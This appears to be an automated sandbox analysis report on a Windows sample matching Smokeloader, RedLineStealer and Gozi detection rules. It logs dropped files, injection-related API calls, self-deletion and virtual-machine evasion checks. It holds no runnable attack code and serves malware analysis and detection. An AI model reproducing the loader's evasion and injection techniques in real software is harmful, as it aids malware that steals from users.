                Source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.471661867.0000000000513000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.415096817.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.471455998.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.415328456.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: loader_250246_15072022_2203_31102022.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00401991
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00410C30
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00411A10
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00401991
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00410C30
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00411A10
                Source: C:\Users\user\AppData\Local\Temp\3196.exeCode function: 5_2_00E07C88
                Source: C:\Users\user\AppData\Local\Temp\3196.exeCode function: 5_2_00E08558
                Source: C:\Users\user\AppData\Local\Temp\3196.exeCode function: 5_2_00E07940
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004382FC
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00432DCC
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00432792
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: String function: 0040CCD0 appears 31 times
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: String function: 0040CCD0 appears 31 times
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_004018F5 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00401900 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_0040190B Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00401912 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_00401920 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_004018F4 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_004018F5 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00401900 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_0040190B Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00401912 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_00401920 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_004018F4 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00401D95 GetProcAddress,NtCreateSection,memset,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00401F78 NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_0043737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00438521 NtQueryVirtualMemory,
                Source: cqu7x.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: vcivdjd.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: C:\Windows\explorer.exeSection loaded: webio.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
                Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\vcivdjd B9FD7622C3FCFDD6EB9B2CB917A3CB64EB35C61221DE4866303CA88D828D5BED
                Source: 3196.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: loader_250246_15072022_2203_31102022.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: cqu7x.exeReversingLabs: Detection: 92%
                Source: cqu7x.exeMetadefender: Detection: 40%
                Source: cqu7x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\cqu7x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\cqu7x.exe C:\Users\user\Desktop\cqu7x.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\vcivdjd C:\Users\user\AppData\Roaming\vcivdjd
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3196.exe C:\Users\user\AppData\Local\Temp\3196.exe
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3196.exe C:\Users\user\AppData\Local\Temp\3196.exe
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe"
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Users\user\AppData\Local\Temp\3196.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vcivdjdJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3196.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/5@3/2
                Source: C:\Users\user\AppData\Local\Temp\3196.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3196.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00437256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3196.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\cqu7x.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: cqu7x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb8hC source: cqu7x.exe, vcivdjd.1.dr
                Source: Binary string: C:\tayaho\fijopeyado\yitopiwozobog\zolusay pe.pdb source: cqu7x.exe, vcivdjd.1.dr

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\cqu7x.exeUnpacked PE file: 0.2.cqu7x.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\vcivdjdUnpacked PE file: 4.2.vcivdjd.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_004010DE push cs; ret
                Source: C:\Users\user\Desktop\cqu7x.exeCode function: 0_2_0040199E push cs; retf
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_004010DE push cs; ret
                Source: C:\Users\user\AppData\Roaming\vcivdjdCode function: 4_2_0040199E push cs; retf
                Source: C:\Users\user\AppData\Local\Temp\3196.exeCode function: 5_2_00E0A5E0 push eax; retf
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_0043B859 push 0000006Fh; retf
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004382EB push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00437F00 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_0040134F LoadLibraryA,GetProcAddress,
                Source: initial sampleStatic PE information: section name: .text entropy: 7.3931970143179395
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vcivdjdJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3196.exeFile created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3196.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vcivdjdJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\cqu7x.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vcivdjd:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\cqu7x.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\vcivdjdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 5464Thread sleep count: 644 > 30
                Source: C:\Windows\explorer.exe TID: 2348Thread sleep count: 345 > 30
                Source: C:\Windows\explorer.exe TID: 2348Thread sleep time: -34500s >= -30000s
                Source: C:\Windows\explorer.exe TID: 5452Thread sleep count: 411 > 30
                Source: C:\Windows\explorer.exe TID: 5452Thread sleep time: -41100s >= -30000s
                Source: C:\Windows\explorer.exe TID: 2408Thread sleep count: 567 > 30
                Source: C:\Windows\explorer.exe TID: 3232Thread sleep count: 270 > 30
                Source: C:\Windows\explorer.exe TID: 632Thread sleep count: 274 > 30
                Source: C:\Users\user\AppData\Local\Temp\3196.exe TID: 2224Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\3196.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 644
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 411
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 567
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\3196.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                Source: C:\Users\user\Desktop\cqu7x.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\3196.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\cqu7x.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeAPI call chain: ExitProcess graph end node
                Source: 3196.exe, 00000005.00000000.450316157.0000000000662000.00000002.00000001.01000000.00000007.sdmp, 3196.exe.1.drBinary or memory string: #Glb#Hlb#Ilb#7x#Jlb#Klb#Llb#Mlb#Nlb#S#Olb#Plb#Qlb#Rlb#Slb#Tlb#T#U#nLb#W#X#Y#Z#K1#oLb#2#pLb.ctor#ALb#sb#tb#ub#vb#BLb#CLb#DLb#b2#c2#ELb#FLbParameterInfo#Db.cctorobjectmethodInvokesddddffshdjfffffgjskdgsacsafpsfhjfkfhfjsfhdhffadsfssscfgdbdfjfsffafcfdssfkfhgjBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresultffchkffaffsdssfjjffasfcfgsdfsgkffjjcfssafffdsdgkfffffchkfffdafsssfjjffafsffdcssgkffjjcfsfdsafsdgkffffjsfhdgffffdffdkfgfgjjfsgfdfffffffdhfkffdgjhdssdgfddfkshfffdjgdffgkfhfddjsdfdffhdfhsfjfgfhsddfdffhfjfdfdghfffdfkdgdsfhjdfffgdkddfffkshgfsgssddhdffjkffdfkgdsfsdffgfkdhjfdfhgdfjfgjffgfgjfgjhgdgdfjjkjkjjfgjhgdfjkjytfjkjkjjfgjjfghksfsfsdhjjjhgjkdgfddafdafjfsddffddffdhffkadhdsafdfadfdkfffjfsddfffddfdhffkadhdsaffdadfdkffdsdsdffhfffdfsdhkdfhfsdfdsfhffdddkffsjkkfdfhdhfsddfffgkdhfffssddfgdfjdsdhsdfdfkfgfdhhjhgffhddfkshddffgjfsdssfssssahddhfdfkgjddssssssssssssssdfsssssssffsddhfhkfjjdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfsdfffhhfhhsdfffdsshfffsdfdhfhffdsffsfdshfsdhshhhgfdffsfdfsfhsfdfsfhffffdhsfddsfffhssffdsfhdfffhhfdhssfdffsfjhffssfdffdfdhstartupInfokpcSaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdshfsdhshhhgfdfffdfsfhsfdfsfhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType#le#mefsdssffff4gdgdsfsdffsdssfffgdffffffgdsfsdfUnverifiableCodeAttributeSystem.SecurityCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeSuppressIldasmAttributeCompilerGeneratedAttributeAttributeUsageAttributeAttributeTargetsngk.resources{aac12949-fa12-4497-a592-42d1dcf12d48}KeyNotFoundExceptionIndexOutOfRangeExceptionByteRfc2898DeriveBytesCryptoStreamCryptoStreamModeRijndaelManagedMD5CryptoServiceProviderAssemblyBuilderSystem.Reflection.EmitDefineDynamicModuleModuleBuilderDefineTypeTypeBuilderTypeAttributesGetMethodMethodInfoMethodBaseGetParametersFunc`2System.CoreEnumerableSystem.LinqSelectIEnumerable`1get_ReturnTypeDefinePInvokeMethodMethodBuilderMethodAttributesCallingConventionsCallingConventionCharSetGetMethodImplementationFlagsMethodImplAttributesSetImplementationFlagsCreateTypeDelegateCreateDelegateAppDomainget_CurrentDomainAssemblyNameDefineDynamicAssemblyAssemblyBuilderAccessZeroExceptionInt32get_ParameterTypeResolveTypeHandleMemberInfoget_NameResolveMethodHandleRuntimeMethodHandleGetMethodFromHandleget_IsStaticFieldInfoget_FieldTypeEmptyDynamicMethodGetILGeneratorILGeneratorOpCodesLdarg_0OpCodeEmitLdarg_1Ldarg_2Ldarg_3Ldarg_STailcallCallCallvirtRetSetValueGetFieldsBindingFlagsCharGetModulesModuleget_ModuleHandleget_ModuleGetMethodsLdc_I4get_MetadataTokenSubAddTryGetValue
                Source: explorer.exe, 00000001.00000000.355555979.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
                Source: explorer.exe, 00000001.00000000.385847732.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000001.00000000.380989996.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                Source: explorer.exe, 00000001.00000000.356179224.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.388700292.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
                Source: explorer.exe, 00000001.00000000.362750745.000000000856B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586272240.0000000000683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: explorer.exe, 00000001.00000000.385847732.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
